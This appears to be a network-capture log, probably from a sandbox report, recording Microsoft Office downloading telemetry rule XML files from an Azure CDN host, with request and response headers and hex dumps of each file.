                                                                                                                                                                                                            2024-11-22 03:27:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            86192.168.2.44991513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:29 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                            x-ms-request-id: 302889d7-401e-0047-2e63-3b8597000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032729Z-178bfbc474bgvl54hC1NYCsfuw000000029g00000000kvku
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            87192.168.2.44991613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:30 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:30 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                            x-ms-request-id: 4e89b2fa-a01e-006f-563a-3c13cd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032730Z-178bfbc474bgvl54hC1NYCsfuw00000002ag00000000hakr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            88192.168.2.44991813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:30 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:30 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                            x-ms-request-id: 4d626343-d01e-0028-4b44-3c7896000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032730Z-178bfbc474btrnf9hC1NYCb80g00000002k0000000009rhz
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            89192.168.2.44991713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:30 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:30 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                            x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032730Z-178bfbc474brk967hC1NYCfu60000000028g000000004hr9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            90192.168.2.44991913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:30 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                            x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032731Z-178bfbc474b9fdhphC1NYCac0n00000002ag00000000bq3h
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            91192.168.2.44992013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                            x-ms-request-id: 6a968014-801e-0015-537c-3bf97f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032731Z-178bfbc474bfw4gbhC1NYCunf4000000029000000000tapy
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:31 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            92192.168.2.44992113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:32 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:32 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:32 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                            x-ms-request-id: 6b04d5e8-e01e-000c-65ad-3b8e36000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032732Z-174c587ffdf8fcgwhC1TEBnn7000000000xg00000000qna7
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:32 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            93192.168.2.44992413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:32 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                            x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032733Z-178bfbc474bwh9gmhC1NYCy3rs00000002kg00000000168w
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            94192.168.2.44992213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:32 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                            x-ms-request-id: a3dd353e-a01e-0032-2c4e-3c1949000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032733Z-178bfbc474bpnd5vhC1NYC4vr400000002a000000000msnh
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            95192.168.2.44992313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC491INHTTP/1.1 200 OK
